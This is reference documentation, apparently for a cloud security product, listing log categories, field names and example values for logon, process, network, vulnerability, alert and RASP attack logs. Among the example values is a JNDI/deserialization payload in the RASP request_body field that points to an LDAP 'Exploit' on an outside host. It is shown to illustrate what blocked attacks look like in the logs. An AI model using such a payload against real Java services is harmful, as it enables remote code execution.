Simple Log Service:Log Categories and Fields

Field

Description

Example

instance_id

The instance ID.

i-2zeg4zldn8zypsfg****

host_ip

The IP address of the server.

192.168.XX.XX

sas_group_name

The asset group of the server in Security Center.

default

uuid

The UUID of the server.

5d83b26b-b7ca-4a0a-9267-12****

src_ip

The source IP address used to log on to the server.

221.11.XX.XX

dst_port

The port used for the logon.

22

login_type

The logon type. Values include but are not limited to: SSHLOGIN (SSH); RDPLOGIN (Remote Desktop); IPCLOGIN (IPC connection).

SSH

username

The username used for the logon.

admin

login_count

The number of logons. Repeated logons within 1 minute are merged into a single entry. For example, a login_count of 3 indicates 3 logons occurred within the last minute.

3

start_time

The start timestamp, in seconds. Also used to indicate the time when the event occurred.

1719472214

auth_type

TAuthentication type, string type.

• 1: Password authentication.

• 2: Key-based authentication.

1

success

Indicates whether the logon was successful. Values: true (successful); false (failed).

true

pid

The PID of the authentication process.

12345

src_port

The source port number of the logon, string type.

43006

ssh_fingerprint

The SSH key fingerprint used for logon, string type. When key-based authentication is used, this field records the corresponding key fingerprint. When password-based authentication is used, this field is empty.

SHA256:xxxxxxxxxxxx

Field

Description

Example

cmd_chain

The process chain.

[ {"9883":"bash -c kill -0 -- -'6274'"} ... ]

cmd_chain_index

The process chain index. Use this index to look up the corresponding process chain.

B184

container_hostname

The hostname within the container.

nginx-ingress-controller-765f67fd4d-****

container_id

The container ID.

4181de1e2b20c3397f1c409266dbd5631d1bc5be7af85246b0d****

container_image_id

The container image ID.

registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-controller@sha256:5f281994d9e71a1b1a087365271024991c5b0d0543c48f0****

container_image_name

The container image name.

registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-****

container_name

The container name.

nginx-ingress-****

container_pid

The process ID within the container.

0

net_connect_dir

The network connection direction. Values: in (inbound); out (outbound).

in

dst_ip

The IP address of the connection receiver. If net_connect_dir is out, this is the peer host. If in, this is the local host.

192.168.XX.XX

dst_port

The port of the connection receiver.

443

instance_id

The instance ID.

i-2zeg4zldn8zypsfg****

host_ip

The IP address of the server.

192.168.XX.XX

parent_proc_name

The filename of the parent process.

/usr/bin/bash

pid

The process ID.

14275

ppid

The parent process ID.

14268

proc_name

The process name.

nginx

proc_path

The process path.

/usr/local/nginx/sbin/nginx

proc_start_time

The process startup time.

N/A

connection_type

The protocol. Values: tcp; raw (raw socket).

tcp

sas_group_name

The asset group of the server in Security Center.

default

src_ip

The source IP address.

100.127.XX.XX

src_port

The source port.

41897

srv_comm

The command name associated with the grandparent process.

containerd-shim

status

The network connection status. Values: 1 (Closed); 2 (Listening); 3 (SYN sent); 4 (SYN received); 5 (Established); 6 (Close wait); 7 (Closing); 8 (FIN wait 1); 9 (FIN wait 2); 10 (Time wait); 11 (TCB deleted).

5

type

The type of real-time network connection. Values: connect (active TCP connection initiated); accept (TCP connection received); listen (port is listening).

listen

uid

The ID of the process user.

101

username

The username of the process.

root

uuid

The UUID of the server.

5d83b26b-b7ca-4a0a-9267-12****

start_time

The start timestamp, in seconds. Also used to indicate the time when the event occurred.

1719472214

Field

Description

Example

cmd_chain

The process chain.

[ {"9883":"bash -c kill -0 -- -'6274'"} ... ]

cmd_chain_index

The process chain index. Use this index to look up the corresponding process chain.

B184

cmd_index

The index of each parameter in the command line. Each pair of values marks the start and end position of a parameter.

0,3,5,8

cmdline

The full command line used to start the process.

ipset list KUBE-6-CLUSTER-IP

comm

The command name associated with the process.

N/A

container_hostname

The hostname within the container.

nginx-ingress-controller-765f67fd4d-****

container_id

The container ID.

4181de1e2b20c3397f1c409266dbd5631d1bc5be7af85246b0d****

container_image_id

The container image ID.

registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-controller@sha256:5f281994d9e71a1b1a087365271024991c5b0d0543c48f0****

container_image_name

The container image name.

registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-****

container_name

The container name.

nginx-ingress-****

container_pid

The process ID within the container.

0

cwd

The working directory of the process.

N/A

proc_name

The process filename.

ipset

proc_path

The full path of the process file.

/usr/sbin/ipset

gid

The process group ID.

0

groupname

The user group name.

group1

instance_id

The instance ID.

i-2zeg4zldn8zypsfg****

host_ip

The IP address of the server.

192.168.XX.XX

parent_cmd_line

The command line of the parent process.

/usr/local/bin/kube-proxy --config=/var/lib/kube-proxy/config.conf --hostname-override=cn-beijing.192.168.XX.XX

parent_proc_name

The filename of the parent process.

kube-proxy

parent_proc_path

The full path of the parent process file.

/usr/local/bin/kube-proxy

pid

The process ID.

14275

ppid

The parent process ID.

14268

proc_start_time

The process startup time.

2024-08-01 16:45:40

parent_proc_start_time

The startup time of the parent process.

2024-07-12 19:45:19

sas_group_name

The asset group of the server in Security Center.

default

srv_cmd

The command line of the grandparent process.

/usr/bin/containerd

tty

The logon terminal. N/A indicates the account has never logged on to a terminal.

N/A

uid

The user ID.

123

username

The username of the process.

root

uuid

The UUID of the server.

5d83b26b-b7ca-4a0a-9267-12****

start_time

The start timestamp, in seconds. Also used to indicate the time when the event occurred.

1719472214

Field

Description

Example

instance_id

The instance ID.

i-2zeg4zldn8zypsfg****

host_ip

The IP address of the server under brute-force attack.

192.168.XX.XX

sas_group_name

The asset group of the server in Security Center.

default

uuid

The UUID of the server under brute-force attack.

5d83b26b-b7ca-4a0a-9267-12*****

login_count

The number of failed logon attempts. Repeated attempts within 1 minute are merged into a single entry. For example, a login_count of 3 indicates 3 attempts within the last minute.

3

src_ip

The source IP address of the logon attempt.

47.92.XX.XX

dst_port

The logon port.

22

login_type

The logon type. Values: SSHLOGIN (SSH logon); RDPLOGIN (Remote Desktop logon); IPCLOGIN (IPC connection logon); SQLSERVER (SQL Server logon failure).

SSH

username

The logon username.

user

start_time

The start timestamp, in seconds. Also used to indicate the time when the event occurred.

1719472214

Field

Description

Example

account_expire

The account expiration date. The value never means the account never expires.

never

domain

The domain or directory service the account belongs to. N/A means the account does not belong to any domain.

N/A

groups

The groups the account belongs to. N/A means the account does not belong to any group.

["nscd"]

home_dir

The home directory, the default location for storing and managing files in the system.

/Users/abc

instance_id

The instance ID.

i-2zeg4zldn8zypsfg****

host_ip

The IP address of the server.

192.168.XX.XX

last_chg

The date the password was last changed.

2022-11-29

last_logon

The date and time of the last logon. N/A means the account has never been used to log on.

2023-08-18 09:21:21

login_ip

The remote IP address of the last logon. N/A means the account has never been used to log on.

192.168.XX.XX

passwd_expire

The password expiration date. The value never means the password never expires.

2024-08-24

perm

Whether the account has root permissions. Values: 0 (no root permissions); 1 (has root permissions).

0

sas_group_name

The asset group of the server in Security Center.

default

shell

The Linux shell.

/sbin/nologin

status

The user account status. Values: 0 (logon prohibited); 1 (logon permitted).

0

tty

The logon terminal. N/A means the account has never logged on to a terminal.

N/A

username

The username.

nscd

uuid

The UUID of the server.

5d83b26b-b7ca-4a0a-9267-12****

warn_time

The password expiration reminder date. The value never means no reminder is set.

2024-08-20

start_time

The start timestamp, in seconds. Also used to indicate the time when the event occurred.

1719472214

Field

Description

Example

net_connect_dir

The network connection direction. Values: in (inbound); out (outbound). Note: Because only logs with status 2 are delivered, net_connect_dir is always in.

in

dst_ip

The peer IP address, generally empty. Note: Because only logs with status 2 are delivered, dst_ip is always empty (the peer IP); src_ip is the local IP.

dst_port

The port of the connection receiver.

443

instance_id

The instance ID.

i-2zeg4zldn8zypsfg****

host_ip

The IP address of the server.

192.168.XX.XX

pid

The process ID.

682

proc_name

The process name.

sshd

connection_type

The protocol. Values: tcp4 (TCP over IPv4); tcp6 (TCP over IPv6).

tcp4

sas_group_name

The asset group of the server in Security Center.

default

src_ip

The local IP address.

100.127.XX.XX

src_port

The listening port.

41897

status

The value is 2, indicating the port is listening; the associated src_ip/src_port is the listening address. Other statuses are not delivered. Remaining possible values (not currently delivered): 1 (Closed); 3 (SYN sent); 4 (SYN received); 5 (Established); 6 (Close wait); 7 (Closing); 8 (FIN wait 1); 9 (FIN wait 2); 10 (Time wait); 11 (TCB deleted).

5

uuid

The UUID of the server.

5d83b26b-b7ca-4a0a-9267-12****

start_time

The start timestamp, in seconds. Also used to indicate the time when the event occurred.

1719472214

Field

Description

Example

cmdline

The full command line used to start the process.

/usr/local/share/assist-daemon/assist_daemon

instance_id

The instance ID.

i-2zeg4zldn8zypsfg****

host_ip

The IP address of the server.

192.168.XX.XX

md5

The MD5 hash of the binary file. Files larger than 1 MB are not calculated.

1086e731640751c9802c19a7f53a64f5

proc_name

The process filename.

assist_daemon

proc_path

The full path of the process file.

/usr/local/share/assist-daemon/assist_daemon

pid

The process ID.

1692

pname

The filename of the parent process.

systemd

sas_group_name

The asset group of the server in Security Center.

default

proc_start_time

The process startup time. Built-in field.

2023-08-18 20:00:12

uid

The process user ID.

101

username

The username of the process.

root

uuid

The UUID of the server.

5d83b26b-b7ca-4a0a-9267-12****

start_time

The start timestamp, in seconds. Also used to indicate the time when the event occurred.

1719472214

Field

Description

Example

domain

The domain name corresponding to the DNS request.

example.aliyundoc.com

instance_id

The instance ID.

i-2zeg4zldn8zypsfg****

host_ip

The IP address of the server that initiated the DNS request.

192.168.XX.XX

pid

The process ID that initiated the DNS request.

3544

ppid

The parent process ID that initiated the DNS request.

3408

cmd_chain

The process chain that initiated the DNS request.

"3544":"\"C:\\Program Files (x86)\\Alibaba\\Aegis\\AliDetect\\AliDetect.exe\""

cmdline

The command line that initiated the DNS request.

C:\Program Files (x86)\Alibaba\Aegis\AliDetect\AliDetect.exe

proc_path

The path of the process that initiated the DNS request.

C:/Program Files (x86)/Alibaba/Aegis/AliDetect/AliDetect.exe

sas_group_name

The asset group of the server in Security Center.

default

time

The time the DNS request event was captured. This time generally matches the actual occurrence of the DNS request.

2023-08-17 20:05:04

uuid

The UUID of the server that initiated the DNS request.

5d83b26b-b7ca-4a0a-9267-12****

start_time

The start timestamp, in seconds. Also used to indicate the time when the event occurred.

1719472214

Field

Description

Example

uuid

The UUID of the server.

5d83b26b-b7ca-4a0a-9267-12****

host_ip

The IP address of the server.

192.168.XX.XX

agent_version

The client version.

aegis_11_91

last_login

The timestamp of the previous logon, in milliseconds.

1716444387617

platform

The operating system type. Values: windows; linux.

linux

region_id

The region ID where the server resides.

cn-beijing

status

The client status. Values: online; offline.

online

start_time

The start timestamp, in seconds. Also used to indicate the time when the event occurred.

1719472214

Field

Description

Example

vul_alias_name

The vulnerability alias.

CESA-2023:1335: openssl Security Update

risk_level

The risk level. Values: asap (High); later (Medium); nntf (Low).

later

extend_content

Extended vulnerability information in JSON format.

{"cveList":["CVE-2023-0286"],"necessity":{...},"os":"centos",...}

instance_id

The instance ID.

i-2zeg4zldn8zypsfg****

internet_ip

The public IP address of the asset.

39.104.XX.XX

intranet_ip

The private IP address of the asset.

192.168.XX.XX

instance_name

The hostname.

hhht-linux-***

vul_name

The vulnerability name.

centos:7:cesa-2023:1335

operation

The action performed on the vulnerability. Values: new (New); verify (Verify); fix (Fix).

new

status

The vulnerability status. Values: 1 (Unfixed); 2 (Fix failed); 3 (Rollback failed); 4 (Fixing); 5 (Rolling back); 6 (Verifying); 7 (Fixed); 8 (Fixed, restart required); 9 (Rolled back); 10 (Ignored); 11 (Rolled back, restart required); 12 (Does not exist); 13 (Invalid).

1

tag

The vulnerability tag. Values: oval (Linux software vulnerability); system (Windows system vulnerability); app (application vulnerability). Tags for other vulnerability types are random strings.

oval

type

The vulnerability type. Values: sys (Windows system vulnerability); cve (Linux software vulnerability); emg (Urgent vulnerability).

sys

uuid

The UUID of the server.

ad66133a-dc82-4e5e-9659-a49e3****

start_time

The start timestamp, in seconds. Also used to indicate the time when the event occurred.

1719472214

Field

Description

Example

check_item_name

The name of the check item.

Set minimum interval for password changes

check_item_level

The severity level of the baseline check. Values: high (High); medium (Medium); low (Low).

medium

check_type

The type of the check item.

Identity authentication

instance_id

The instance ID.

i-2zeg4zldn8zypsfg****

risk_level

The risk level. Values: high (High); medium (Medium); low (Low).

medium

operation

The operation. Values: new (New); verity (Validation).

new

risk_name

The name of the risk item.

Password policy compliance check

sas_group_name

The asset group of the server in Security Center where the risk item was detected.

default

status

The status information. Two sets of status codes apply: Baseline check statuses: 1 (Failed); 2 (Verifying); 6 (Ignored); 7 (Fixing). Handling statuses: 1 (Unfixed); 2 (Fix failed); 3 (Rollback failed); 4 (Fixing); 5 (Rolling back); 6 (Verifying); 7 (Fixed); 8 (Fixed, restart required); 9 (Rolled back); 10 (Ignored); 11 (Rolled back, restart required); 12 (Does not exist); 13 (Invalid).

1

sub_type_alias_name

The alias of the subtype.

International security best practices - Ubuntu 16/18/20/22 security baseline check

sub_type_name

The baseline subtype name. For valid values, see the List of baseline types and subtypes.

hc_ubuntu16_cis_rules

type_alias_name

The alias of the type.

International security best practices

type_name

The baseline type. For valid values, see the List of baseline types and subtypes.

cis

uuid

The UUID of the server where the risk item was detected.

1ad66133a-dc82-4e5e-9659-a49e3****

start_time

The start timestamp, in seconds. Also used to indicate the time when the event occurred.

1719472214

Field

Description

Example

data_source

The data source. Values: aegis_suspicious_event (Host Anomaly); aegis_suspicious_file_v2 (Webshell); aegis_login_log (Anomalous Logon); honeypot (Cloud Honeypot Alert Event); object_scan (File Detection Anomaly); security_event (Security Center Anomaly); sas_ak_leak (AK Leak Event).

aegis_login_log

detail

A structured object (JSON) providing detailed alert context. Fields vary by alert type. Common values for the alert_reason field: reason1 (IP is not from a common logon location); reason2 (API call failed); reason3 (IP is not from a common logon location and API call failed).

{"loginSourceIp":"221.11.XX.XX","loginDestinationPort":22,"loginUser":"root",...}

instance_id

The instance ID.

i-2zeg4zldn8zypsfg****

internet_ip

The public IP address of the asset.

39.104.XX.XX

intranet_ip

The private IP address of the asset.

192.168.XX.XX

level

The risk level of the alert event. Values: serious (Urgent); suspicious (Suspicious); remind (Reminder).

suspicious

name

The alert name.

Anomalous Logon - ECS Unusual Account Logon

operation

The operation. Values: new (New); dealing (Processing); update (Updated).

new

status

The alert status. Values: 1 (Unhandled, default for new alerts); 2 (Ignored, after executing the Ignore action); 8 (Whitelisted, after adding to whitelist); 16 (Processing, during end-process/isolate-file/whitelist actions); 32 (Processed, after manual handling or completing end-process/isolate-file actions); 64 (Expired, if no action is taken within 30 days); 513 (Auto-blocked, the alert has been automatically blocked by the precise defense feature of Security Center and does not require manual handling).

1

unique_info

The unique identifier of the alert.

2536dd765f804916a1fa3b9516b5****

uuid

The UUID of the server where the alert was generated.

ad66133a-dc82-4e5e-9659-a49e3****

start_time

The start timestamp, in seconds. Also used to indicate the time when the event occurred.

1719472214

suspicious_event_id

The alert event ID.

650226318

handle_time

The timestamp corresponding to the operation.

1765272845

alert_first_time

The timestamp when the alert first appeared.

1764226915

alert_last_time

The timestamp when the alert last appeared.

1765273425

strict_mode

Indicates whether the alert is in strict mode. Values: true; false.

true

user_id

The account ID.

1358******3357

Field

Description

Example

check_id

The check item ID. You can obtain this ID by calling the ListCheckResult operation.

11

check_item_name

The name of the check item.

Origin fetch configuration

instance_id

The instance ID.

i-2zeg4zldn8zypsfg****

instance_name

The instance name.

lsm

instance_result

The impact of the risk, as a JSON string.

{"Checks":[{}],"Columns":[{"key":"RegionIdShow","search":true,...}]}

instance_sub_type

The instance subtype. Values depend on instance_type: For ECS: INSTANCE, DISK, SECURITY_GROUP. For ACR: REPOSITORY_ENTERPRISE, REPOSITORY_PERSON. For RAM: ALIAS, USER, POLICY, GROUP. For WAF: DOMAIN. For other types: INSTANCE.

INSTANCE

instance_type

The instance type. Values: ECS (Elastic Compute Service); SLB (Server Load Balancer); RDS (ApsaraDB RDS); MONGODB (ApsaraDB for MongoDB); KVSTORE (ApsaraDB for Redis); ACR (Container Registry); CSK; VPC (Virtual Private Cloud); ACTIONTRAIL (ActionTrail); CDN (Content Delivery Network); CAS (Certificate Management Service); RDC (Apsara DevOps); RAM (Resource Access Management); DDoS (Anti-DDoS); WAF (Web Application Firewall); OSS (Object Storage Service); PolarDB (PolarDB); POSTGRESQL (ApsaraDB RDS for PostgreSQL); MSE (Microservices Engine); NAS (File Storage NAS); SDDP (Sensitive Data Discovery and Protection); EIP (Elastic IP Address).

ECS

region_id

The region ID where the instance resides.

cn-hangzhou

requirement_id

The requirement ID. You can obtain this ID by calling the ListCheckStandard operation.

5

risk_level

The risk level. Values: LOW; MEDIUM; HIGH.

MEDIUM

section_id

The section ID. You can obtain this ID by calling the ListCheckResult operation.

1

standard_id

The standard ID. You can obtain this ID by calling the ListCheckStandard operation.

1

status

The check item status. Values: NOT_CHECK (Not checked); CHECKING (Checking); PASS (Passed); NOT_PASS (Failed); WHITELIST (Whitelisted).

PASS

vendor

The cloud service provider. Fixed value: ALIYUN.

ALIYUN

start_time

The start timestamp, in seconds. Also used to indicate the time when the event occurred.

1719472214

Field

Description

Example

cmd

The command line of the attacked process.

nginx: master process nginx

cur_time

The time the attack event occurred.

2023-09-14 09:21:59

decode_payload

The payload converted from HEX to characters.

POST /Services/FileService/UserFiles/

dst_ip

The IP address of the attacked asset.

172.16.XX.XX

dst_port

The port of the attacked asset.

80

func

The type of the intercepted event. Values: payload (malicious payload interception, triggered by detecting malicious data or commands); tuple (malicious IP interception, triggered by detecting malicious IP access).

payload

rule_type

The specific rule type of the intercepted event. Values: alinet_payload (payload event defense rule defined by Security Center); alinet_tuple (tuple event defense rule defined by Security Center).

alinet_payload

instance_id

The instance ID of the attacked asset.

i-2zeg4zldn8zypsfg****

internet_ip

The public IP address of the attacked asset.

39.104.XX.XX

intranet_ip

The private IP address of the attacked asset.

192.168.XX.XX

final_action

The defense action. Fixed value: block (Blocked).

block

payload

The payload in HEX format.

504f5354202f20485454502f312e310d0a436f6e74656e742d547970653a20746578742f706c61696e0d0a557365722d4167656e743a20****

pid

The ID of the attacked process.

7107

platform

The system type of the attacked asset. Values: windows; linux.

linux

proc_path

The path of the attacked process.

/usr/sbin/nginx

sas_group_name

The asset group of the server in Security Center.

default

src_ip

The source IP address of the attack.

106.11.XX.XX

src_port

The source port of the attack.

29575

uuid

The UUID of the server.

5d83b26b-b7ca-4a0a-9267-12****

start_time

The start timestamp, in seconds. Also used to indicate the time when the event occurred.

1719472214

Field

Description

Example

app_dir

The directory where the application resides.

/usr/local/aegis/rasp/apps/1111

app_id

The application ID.

6492a391fc9b4e2aad94****

app_name

The application name.

test

confidence_level

The detection algorithm confidence level. Values: high; medium; low.

low

request_body

The request body.

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://172.220.XX.XX:1389/Exploit","autoCommit":true}

request_content_length

The length of the request body.

112

data

The hook point parameters.

{"cmd":"bash -c kill -0 -- -'31098' "}

headers

The request headers.

{"content-length":"112","referer":"http://120.26.XX.XX:8080/demo/Serial",...}

hostname

The name of the host or network device.

testhostname

host_ip

The private IP address of the host.

172.16.XX.XX

is_cliped

Indicates whether the log was truncated due to exceeding the length limit. Values: true (truncated); false (not truncated).

false

jdk_version

The JDK version.

1.8.0_292

message

The alert description.

Unsafe class serial.

request_method

The HTTP request method.

Post

platform

The operating system type.

Linux

arch

The operating system architecture.

amd64

kernel_version

The operating system kernel version.

3.10.0-1160.59.1.el7.x86_64

param

The request parameters. Common formats include GET parameters and application/x-www-form-urlencoded.

{"url":["http://127.0.0.1.xip.io"]}

payload

The effective attack payload.

bash -c kill -0 -- -'31098'

payload_length

The length of the attack payload.

27

rasp_id

The unique ID of the RASP probe.

fa00223c8420e256c0c98ca0bd0d****

rasp_version

The RASP probe version.

0.8.5

src_ip

The IP address of the requester.

172.0.XX.XX

final_action

The alert handling result. Values: block (Blocked); monitor (Monitoring).

block

rule_action

The alert handling method specified by the rule. Values: block; monitor.

block

risk_level

The risk level. Values: high; medium; low.

high

stacktrace

The stack trace.

[java.io.FileInputStream.<init>(FileInputStream.java:123), ...]

time

The time the alert was triggered.

2023-10-09 15:19:15

timestamp

The timestamp when the alert was triggered, in milliseconds.

1696835955070

type

The attack type. Values: attach (malicious attach); beans (malicious beans binding); classloader (malicious class loading); dangerous_protocol (dangerous protocol use); dns (malicious DNS query); engine (engine injection); expression (expression injection); file (malicious file read/write); file_delete (arbitrary file deletion); file_list (directory traversal); file_read (arbitrary file read); file_upload (malicious file upload); jndi (JNDI injection); jni (JNI injection); jstl (JSTL arbitrary file inclusion); memory_shell (in-memory webshell injection); rce (remote code execution); read_object (deserialization attack); reflect (malicious reflection); sql (SQL injection); ssrf (malicious outbound connection); thread_inject (thread injection); xxe (XXE attack).

rce

url

The request URL.

http://127.0.0.1:999/xxx

rasp_attack_uuid

The UUID of the attack event.

18823b23-7ad4-47c0-b5ac-e5f036a2****

uuid

The host UUID.

23f7ca61-e271-4a8e-bf5f-165596a16****

internet_ip

The public IP address of the host.

1.2.XX.XX

intranet_ip

The private IP address of the host.

172.16.XX.XX

sas_group_name

The Security Center server group name.

Group 1

instance_id

The host instance ID.

i-wz995eivg28f1m**

start_time

The start timestamp, in seconds. Also used to indicate the time when the event occurred.

1719472214

Field

Description

Example

bucket_name

The OSS bucket name.

***-test

event_id

The alert ID.

802210

event_name

The alert name.

Mining program

md5

The MD5 hash of the file.

6bc2bc******53d409b1

sha256

The SHA256 hash of the file.

f038f9525******7772981e87f85

result

The detection result. Values: 0 (File is safe); 1 (Malicious file detected).

0

file_path

The file path.

test.zip/bin_test

etag

The OSS file identifier.

6BC2B******853D409B1

risk_level

The risk level. Values: serious (Urgent); suspicious (Suspicious); remind (Reminder).

remind

source

The detection scenario. Values: OSS (file detection in an OSS bucket via the Security Center console); API (malicious file detection via the Java or Python SDK).

OSS

parent_md5

The MD5 hash of the parent file or archive file.

3d0f8045bb9******

parent_sha256

The SHA256 hash of the parent file or archive file.

69b643d6******a3fb859fa

parent_file_path

The name of the parent file or archive file.

test.zip

start_time

The start timestamp, in seconds. Also used to indicate the time when the event occurred.

1719472214

compress_file_number

The subfile sequence number in an archive, in the format [current]/[total]. For example, 1/10 means this is file 1 of 10 in the archive.

1/10

Field

Description

Example

start_time

The latest occurrence time of the event, in seconds.

1718678414

uuid

The UUID of the client.

5d83b26b-b**a-4**a-9267-12****

file_path

The file path.

/etc/passwd

proc_path

The process path.

/usr/bin/bash

rule_id

The ID of the matched rule.

123

rule_name

The rule name.

file_test_rule

cmdline

The command line.

bash /opt/a

operation

The operation performed on the file.

READ

risk_level

The alert level.

2

pid

The process ID.

45324

proc_permission

The process permissions.

rwxrwxrwx

instance_id

The instance ID.

i-wz995eivg2****

internet_ip

The public IP address.

192.0.2.1

intranet_ip

The private IP address.

172.16.0.1

instance_name

The instance name.

aegis-test

platform

The operating system type.

Linux

Type name

Subtype name

Description

hc_exploit

hc_exploit_redis

High-risk threat exploit: Unauthorized access to Redis

hc_exploit_activemq

High-risk threat exploit: Unauthorized access to ActiveMQ

hc_exploit_couchdb

High-risk threat exploit: Unauthorized access to CouchDB

hc_exploit_docker

High-risk threat exploit: Unauthorized access to Docker

hc_exploit_es

High-risk threat exploit: Unauthorized access to Elasticsearch

hc_exploit_hadoop

High-risk threat exploit: Unauthorized access to Hadoop

hc_exploit_jboss

High-risk threat exploit: Unauthorized access to JBoss

hc_exploit_jenkins

High-risk threat exploit: Unauthorized access to Jenkins

hc_exploit_k8s_api

High-risk threat exploit: Unauthorized access to Kubernetes API server

hc_exploit_ldap

High-risk threat exploit: Unauthorized access to LDAP (Windows)

hc_exploit_ldap_linux

High-risk threat exploit: Unauthorized access to OpenLDAP (Linux)

hc_exploit_memcache

High-risk threat exploit: Unauthorized access to Memcached

hc_exploit_mongo

High-risk threat exploit: Unauthorized access to MongoDB

hc_exploit_pgsql

High-risk threat exploit: Unauthorized access to PostgreSQL baseline

hc_exploit_rabbitmq

High-risk threat exploit: Unauthorized access to RabbitMQ

hc_exploit_rsync

High-risk threat exploit: Unauthorized access to rsync

hc_exploit_tomcat

High-risk threat exploit: Apache Tomcat AJP file inclusion vulnerability

hc_exploit_zookeeper

High-risk threat exploit: Unauthorized access to ZooKeeper

hc_container

hc_docker

Alibaba Cloud standard: Docker security baseline check

hc_middleware_ack_master

International security best practices: Kubernetes (ACK) master node security baseline check

hc_middleware_ack_node

International security best practices: Kubernetes (ACK) node security baseline check

hc_middleware_k8s

Alibaba Cloud standard: Kubernetes master security baseline check

hc_middleware_k8s_node

Alibaba Cloud standard: Kubernetes node security baseline check

cis

hc_suse 15_djbh

MLPS Level 3: SUSE 15 compliance baseline check

hc_aliyun_linux3_djbh_l3

MLPS Level 3: Alibaba Cloud Linux 3 compliance baseline check

hc_aliyun_linux_djbh_l3

MLPS Level 3: Alibaba Cloud Linux/Aliyun Linux 2 compliance baseline check

hc_bind_djbh

MLPS Level 3: Bind compliance baseline check

hc_centos 6_djbh_l3

MLPS Level 3: CentOS Linux 6 compliance baseline check

hc_centos 7_djbh_l3

MLPS Level 3: CentOS Linux 7 compliance baseline check

hc_centos 8_djbh_l3

MLPS Level 3: CentOS Linux 8 compliance baseline check

hc_debian_djbh_l3

MLPS Level 3: Debian Linux 8/9/10 compliance baseline check

hc_iis_djbh

MLPS Level 3: IIS compliance baseline check

hc_informix_djbh

MLPS Level 3: Informix compliance baseline check

hc_jboss_djbh

MLPS Level 3: JBoss compliance baseline check

hc_mongo_djbh

MLPS Level 3: MongoDB compliance baseline check

hc_mssql_djbh

MLPS Level 3: SQL Server compliance baseline check

hc_mysql_djbh

MLPS Level 3: MySQL compliance baseline check

hc_nginx_djbh

MLPS Level 3: Nginx compliance baseline check

hc_oracle_djbh

MLPS Level 3: Oracle compliance baseline check

hc_pgsql_djbh

MLPS Level 3: PostgreSQL compliance baseline check

hc_redhat 6_djbh_l3

MLPS Level 3: Red Hat Linux 6 compliance baseline check

hc_redhat_djbh_l3

MLPS Level 3: Red Hat Linux 7 compliance baseline check

hc_redis_djbh

MLPS Level 3: Redis compliance baseline check

hc_suse 10_djbh_l3

MLPS Level 3: SUSE 10 compliance baseline check

hc_suse 12_djbh_l3

MLPS Level 3: SUSE 12 compliance baseline check

hc_suse_djbh_l3

MLPS Level 3: SUSE 11 compliance baseline check

hc_ubuntu 14_djbh_l3

MLPS Level 3: Ubuntu 14 compliance baseline check

hc_ubuntu_djbh_l3

MLPS Level 3: Ubuntu 16/18/20 compliance baseline check

hc_was_djbh

MLPS Level 3: WebSphere Application Server compliance baseline check

hc_weblogic_djbh

MLPS Level 3: WebLogic compliance baseline check

hc_win 2008_djbh_l3

MLPS Level 3: Windows 2008 R2 compliance baseline check

hc_win 2012_djbh_l3

MLPS Level 3: Windows 2012 R2 compliance baseline check

hc_win 2016_djbh_l3

MLPS Level 3: Windows 2016/2019 compliance baseline check

hc_aliyun_linux_djbh_l2

MLPS Level 2: Alibaba Cloud Linux/Aliyun Linux 2 compliance baseline check

hc_centos 6_djbh_l2

MLPS Level 2: CentOS Linux 6 compliance baseline check

hc_centos 7_djbh_l2

MLPS Level 2: CentOS Linux 7 compliance baseline check

hc_debian_djbh_l2

MLPS Level 2: Debian Linux 8 compliance baseline check

hc_redhat 7_djbh_l2

MLPS Level 2: Red Hat Linux 7 compliance baseline check

hc_ubuntu_djbh_l2

MLPS Level 2: Ubuntu 16/18 compliance baseline check

hc_win 2008_djbh_l2

MLPS Level 2: Windows 2008 R2 compliance baseline check

hc_win 2012_djbh_l2

MLPS Level 2: Windows 2012 R2 compliance baseline check

hc_win 2016_djbh_l2

MLPS Level 2: Windows 2016/2019 compliance baseline check

hc_aliyun_linux_cis

International security best practices: Alibaba Cloud Linux/Aliyun Linux 2 security baseline check

hc_centos 6_cis_rules

International security best practices: CentOS Linux 6 security baseline check

hc_centos 7_cis_rules

International security best practices: CentOS Linux 7 security baseline check

hc_centos 8_cis_rules

International security best practices: CentOS Linux 8 security baseline check

hc_debian 8_cis_rules

International security best practices: Debian Linux 8 security baseline check

hc_ubuntu 14_cis_rules

International security best practices: Ubuntu 14 security baseline check

hc_ubuntu 16_cis_rules

International security best practices: Ubuntu 16/18/20 security baseline check

hc_win 2008_cis_rules

International security best practices: Windows Server 2008 R2 security baseline check

hc_win 2012_cis_rules

International security best practices: Windows Server 2012 R2 security baseline check

hc_win 2016_cis_rules

International security best practices: Windows Server 2016/2019 security baseline check

hc_kylin_djbh_l3

MLPS Level 3: Kylin compliance baseline check

hc_uos_djbh_l3

MLPS Level 3: UOS compliance baseline check

hc_best_security

hc_aliyun_linux

Alibaba Cloud standard: Alibaba Cloud Linux/Aliyun Linux 2 security baseline check

hc_centos 6

Alibaba Cloud standard: CentOS Linux 6 security baseline check

hc_centos 7

Alibaba Cloud standard: CentOS Linux 7/8 security baseline check

hc_debian

Alibaba Cloud standard: Debian Linux 8/9/10 security baseline check

hc_redhat 6

Alibaba Cloud standard: Red Hat Linux 6 security baseline check

hc_redhat 7

Alibaba Cloud standard: Red Hat Linux 7/8 security baseline check

hc_ubuntu

Alibaba Cloud standard: Ubuntu security baseline check

hc_windows_2008

Alibaba Cloud standard: Windows 2008 R2 security baseline check

hc_windows_2012

Alibaba Cloud standard: Windows 2012 R2 security baseline check

hc_windows_2016

Alibaba Cloud standard: Windows 2016/2019 security baseline check

hc_db_mssql

Alibaba Cloud standard: SQL Server security baseline check

hc_memcached_ali

Alibaba Cloud standard: Memcached security baseline check

hc_mongodb

Alibaba Cloud standard: MongoDB 3.x security baseline check

hc_mysql_ali

Alibaba Cloud standard: MySQL security baseline check

hc_oracle

Alibaba Cloud standard: Oracle 11g security baseline check

hc_pgsql_ali

Alibaba Cloud standard: PostgreSQL security baseline check

hc_redis_ali

Alibaba Cloud standard: Redis security baseline check

hc_apache

Alibaba Cloud standard: Apache security baseline check

hc_iis_8

Alibaba Cloud standard: IIS 8 security baseline check

hc_nginx_linux

Alibaba Cloud standard: Nginx security baseline check

hc_suse 15

Alibaba Cloud standard: SUSE Linux 15 security baseline check

tomcat 7

